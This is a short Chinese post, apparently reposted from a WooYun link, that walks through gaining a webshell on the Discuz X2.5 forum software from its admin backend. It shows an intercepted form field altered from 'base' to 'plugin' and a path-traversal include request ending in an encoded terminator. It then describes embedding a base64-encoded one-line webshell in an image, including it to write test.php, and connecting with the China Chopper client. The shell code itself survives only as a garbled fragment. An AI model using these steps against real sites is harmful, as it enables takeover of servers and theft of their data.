原帖地址内容:
http://zone.wooyun.org/content/3894

用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)

1 Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

改为

1 Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

访问


1 /home.php?mod=spacecp&id=../../robots.txt%0057


本地测试dzx2.5抓包 把base改为下图中的plugin

discuz 最新后台getshell_第1张图片

 
  
 
  

 
  
测试环境中,上传的一句话***菜刀连接失败,最后改为了base64加密
 
  
//加密前的内容
');));?>
//加密后的内容

 
  
合成图片***,上传,
 
  
/home.php?mod=spacecp&id=../../图片马地址%0057
 
  
在当前目录下生成了test.php,菜刀连接之...